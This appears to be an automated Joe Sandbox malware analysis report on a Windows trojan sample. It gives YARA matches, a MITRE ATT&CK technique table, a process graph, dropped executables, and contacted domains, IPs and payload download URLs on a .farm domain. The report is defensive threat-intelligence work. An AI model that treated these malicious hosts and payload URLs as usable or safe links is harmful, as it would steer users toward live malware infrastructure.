                    Source: Yara matchFile source: 0.2.file.exe.459c2e8.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.TypeId.exe.4a46068.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.TypeId.exe.4a96088.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.440c2a8.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.b070000.26.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.TypeId.exe.427ffc0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.InstallUtil.exe.4ae3330.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.TypeId.exe.4a96088.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.txxbiwtbs.exe.3c19948.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.txxbiwtbs.exe.3c19948.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.InstallUtil.exe.4ae3330.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.440c2a8.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.txxbiwtbs.exe.7520000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.445c2c8.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.InstallUtil.exe.91a2688.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.526a0e8.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.4e9edb0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.InstallUtil.exe.91a2688.15.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.8f40000.23.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.459c2e8.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.b070000.26.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.InstallUtil.exe.4259570.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.InstallUtil.exe.4259570.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.txxbiwtbs.exe.7520000.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.4e7ed90.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.8f40000.23.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.6b60000.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.InstallUtil.exe.4059550.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.4e9edb0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.526a0e8.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.TypeId.exe.427ffc0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.6b60000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.InstallUtil.exe.4659590.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.TypeId.exe.4c760c8.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.445c2c8.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.TypeId.exe.4a46068.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.TypeId.exe.4c760c8.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.4e7ed90.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.TypeId.exe.494cee0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.InstallUtil.exe.4659590.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.478c788.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.InstallUtil.exe.4059550.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.3019858995.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2048354854.0000000003AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2167920075.0000000007520000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1808267831.0000000008F40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1783529566.0000000006B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3204622217.0000000009049000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1869188121.0000000004131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3019858995.0000000004659000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1767868411.000000000478C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1830742150.000000000B070000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1767868411.0000000004378000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3019858995.0000000004058000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1767868411.0000000005266000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1790879005.0000000007CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: file.exe PID: 7600, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: TypeId.exe PID: 7764, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8028, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts131
                    Windows Management Instrumentation                    		11
                    Scheduled Task/Job                    		1
                    Access Token Manipulation                    		1
                    Masquerading                    		OS Credential Dumping321
                    Security Software Discovery                    		Remote Services11
                    Archive Collected Data                    		11
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Command and Scripting Interpreter                    		1
                    DLL Side-Loading                    		211
                    Process Injection                    		1
                    Disable or Modify Tools                    		LSASS Memory1
                    Process Discovery                    		Remote Desktop ProtocolData from Removable Media1
                    Non-Standard Port                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts11
                    Scheduled Task/Job                    		Logon Script (Windows)11
                    Scheduled Task/Job                    		141
                    Virtualization/Sandbox Evasion                    		Security Account Manager141
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin SharesData from Network Shared Drive1
                    Ingress Tool Transfer                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts3
                    PowerShell                    		Login Hook1
                    DLL Side-Loading                    		1
                    Access Token Manipulation                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput Capture2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script211
                    Process Injection                    		LSA Secrets123
                    System Information Discovery                    		SSHKeylogging3
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                    Deobfuscate/Decode Files or Information                    		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                    Obfuscated Files or Information                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                    Software Packing                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    DLL Side-Loading                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1458397 Sample: file.exe Startdate: 17/06/2024 Architecture: WINDOWS Score: 100 35 f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm 2->35 37 1.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm 2->37 43 Snort IDS alert for network traffic 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 11 other signatures 2->49 7 TypeId.exe 14 5 2->7         started        10 file.exe 14 9 2->10         started        14 powershell.exe 23 2->14         started        16 2 other processes 2->16 signatures3 process4 dnsIp5 53 Multi AV Scanner detection for dropped file 7->53 55 Machine Learning detection for dropped file 7->55 57 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 7->57 63 2 other signatures 7->63 18 InstallUtil.exe 15 5 7->18         started        41 f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm 188.114.96.3, 443, 49731, 49732 CLOUDFLARENETUS European Union 10->41 29 C:\Users\user\AppData\Local\...\TypeId.exe, PE32 10->29 dropped 31 C:\Users\user\...\TypeId.exe:Zone.Identifier, ASCII 10->31 dropped 33 C:\Users\user\AppData\Local\...\file.exe.log, ASCII 10->33 dropped 59 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->59 61 Loading BitLocker PowerShell Module 14->61 23 conhost.exe 14->23         started        25 conhost.exe 16->25         started        file6 signatures7 process8 dnsIp9 39 1.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm 77.221.140.76, 49735, 58001, 65276 INFOBOX-ASInfoboxruAutonomousSystemRU Russian Federation 18->39 27 C:\Users\user\AppData\Local\...\txxbiwtbs.exe, PE32 18->27 dropped 51 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 18->51 file10 signatures11

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    file.exe13%ReversingLabsWin32.Trojan.Barys
                    file.exe39%VirustotalBrowse
                    file.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe13%ReversingLabsWin32.Trojan.Barys

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://nuget.org/NuGet.exe0%URL Reputationsafe
                    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                    http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                    http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
                    https://contoso.com/License0%URL Reputationsafe
                    https://contoso.com/Icon0%URL Reputationsafe
                    https://contoso.com/0%URL Reputationsafe
                    https://nuget.org/nuget.exe0%URL Reputationsafe
                    https://aka.ms/pscore680%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm/don2-m/Dllzeadr.pdf0%Avira URL Cloudsafe
                    https://stackoverflow.com/q/14436606/233540%Avira URL Cloudsafe
                    http://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm0%Avira URL Cloudsafe
                    https://github.com/mgravell/protobuf-net0%Avira URL Cloudsafe
                    https://ion=v4.5T0%Avira URL Cloudsafe
                    https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm/don2/Qlxywcbxa.mp40%Avira URL Cloudsafe
                    https://github.com/Pester/Pester0%Avira URL Cloudsafe
                    http://www.microsoft.0%Avira URL Cloudsafe
                    https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm/don2-m/kr/Wudbi0%Avira URL Cloudsafe
                    http://schemas.microso0%Avira URL Cloudsafe
                    http://crl.m0%Avira URL Cloudsafe
                    https://stackoverflow.com/q/11564914/23354;0%Avira URL Cloudsafe
                    https://github.com/mgravell/protobuf-neti0%Avira URL Cloudsafe
                    http://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm80%Avira URL Cloudsafe
                    http://schemas.xmlsoap.org/wsdl/0%Avira URL Cloudsafe
                    https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.0%Avira URL Cloudsafe
                    https://stackoverflow.com/q/2152978/233540%Avira URL Cloudsafe
                    https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm/don2-m/kr/Wudbiu.exe0%Avira URL Cloudsafe
                    https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm0%Avira URL Cloudsafe
                    http://schemas.microsoft0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm
                    		188.114.96.3
                    		truetrue
                      		unknown
                      1.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm
                      		77.221.140.76
                      		truefalse
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm/don2-m/Dllzeadr.pdftrue
                        • Avira URL Cloud: safe
                        		unknown
                        https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm/don2/Qlxywcbxa.mp4true
                        • Avira URL Cloud: safe
                        		unknown
                        https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm/don2-m/kr/Wudbiu.exetrue
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2289203789.00000182C7537000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2273124397.0000021126CA8000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farmInstallUtil.exe, 00000004.00000002.2976520133.00000000033C9000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://stackoverflow.com/q/14436606/23354file.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1763526633.0000000003526000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.0000000003170000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2976520133.0000000003200000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3095261684.00000000076D6000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.1995844689.0000000002A00000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://github.com/mgravell/protobuf-netJfile.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3095261684.00000000076D6000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmpfalse
                          		unknown
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.1908721371.0000021116E58000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.1923913361.00000182B76E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021116E58000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.1908721371.0000021116E58000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://contoso.com/Licensepowershell.exe, 00000006.00000002.2273124397.0000021126CA8000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://contoso.com/Iconpowershell.exe, 00000006.00000002.2273124397.0000021126CA8000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://github.com/mgravell/protobuf-netfile.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3095261684.00000000076D6000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.microsoft.powershell.exe, 00000006.00000002.2347588371.000002112F32A000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://ion=v4.5Tpowershell.exe, 00000001.00000002.2345847023.00000182CF8C6000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.1908721371.0000021116E58000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.microsofile.exe, 00000000.00000002.1789639440.0000000007729000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm/don2-m/kr/WudbiInstallUtil.exe, 00000004.00000002.2976520133.00000000033B4000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://crl.mpowershell.exe, 00000001.00000002.2345847023.00000182CF8C6000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://github.com/mgravell/protobuf-netifile.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3095261684.00000000076D6000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://stackoverflow.com/q/11564914/23354;file.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3095261684.00000000076D6000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://stackoverflow.com/q/2152978/23354file.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3095261684.00000000076D6000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1923913361.00000182B76E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021116E58000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://contoso.com/powershell.exe, 00000006.00000002.2273124397.0000021126CA8000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2289203789.00000182C7537000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2273124397.0000021126CA8000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://aka.ms/pscore68powershell.exe, 00000001.00000002.1923913361.00000182B74C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021116C31000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm8InstallUtil.exe, 00000004.00000002.2976520133.00000000033C9000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefile.exe, 00000000.00000002.1763526633.0000000003371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923913361.00000182B74C1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.0000000003121000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2976520133.0000000003051000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021116C31000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.1995844689.0000000002851000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.InstallUtil.exe, 00000004.00000002.2976520133.00000000033B4000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farmfile.exe, 00000000.00000002.1763526633.0000000003371000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.0000000003121000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2976520133.00000000033B4000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.1995844689.0000000002851000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.microsoftfile.exe, 00000000.00000002.1788650172.0000000007287000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          188.114.96.3
                          		f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farmEuropean Union
                          		13335CLOUDFLARENETUStrue
                          77.221.140.76
                          		1.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farmRussian Federation
                          		30968INFOBOX-ASInfoboxruAutonomousSystemRUfalse

                          General Information

                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1458397
                          Start date and time:2024-06-17 16:17:45 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 10m 34s
                          Hypervisor based Inspection enabled:false
                          Report type:light
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:13
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@9/15@2/2
                          EGA Information:
                          • Successful, ratio: 60%
                          HCA Information:
                          • Successful, ratio: 87%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                          • TCP Packets have been reduced to 100
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target TypeId.exe, PID 7764 because it is empty
